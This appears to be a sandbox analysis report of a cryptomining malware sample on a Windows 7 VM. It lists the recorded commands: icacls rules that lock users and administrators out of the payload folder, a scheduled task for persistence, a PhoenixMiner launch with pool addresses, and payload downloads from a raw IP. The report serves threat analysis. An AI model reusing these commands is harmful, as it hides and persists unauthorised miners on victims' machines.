Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 9, 2021, 11:31 a.m. | March 9, 2021, 11:33 a.m. |
Process | Command line | PID |
---|---|---|
cmd.exe | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)" | 1972 |
icacls.exe | icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)" | 2420 |
icacls.exe | icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)" | 1812 |
cmd.exe | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))" | 2908 |
icacls.exe | icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))" | 1108 |
cmd.exe | C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10 | 2064 |
schtasks.exe | schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10 | 872 |
PhoenixMiner.exe | "C:\ProgramData\NetWork\PhoenixMiner.exe" -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0 | 2316 |
cmd.exe | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)" | 2032 |
icacls.exe | icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)" | 1276 |
icacls.exe | icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)" | 2724 |
cmd.exe | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))" | 2740 |
icacls.exe | icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))" | 2664 |
cmd.exe | C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10 | 2612 |
schtasks.exe | schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10 | 2620 |
PhoenixMiner.exe | "C:\ProgramData\NetWork\PhoenixMiner.exe" -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0 | 288 |
Suricata Alerts
Suricata TLS
No Suricata TLS
Indicator | Value |
---|---|
suspicious_features | Connection to IP address |
suspicious_request | GET http://194.147.115.117/zzztop/PhoenixMiner.exe |
suspicious_features | Connection to IP address |
suspicious_request | GET http://194.147.115.117/zzztop/This.exe |
request | GET http://194.147.115.117/zzztop/PhoenixMiner.exe |
request | GET http://194.147.115.117/zzztop/This.exe |
file | C:\ProgramData\NetWork\PhoenixMiner.exe |
file | C:\ProgramData\NetWork\This.exe |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)" |
cmdline | schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10 |
cmdline | C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10 |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))" |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)" |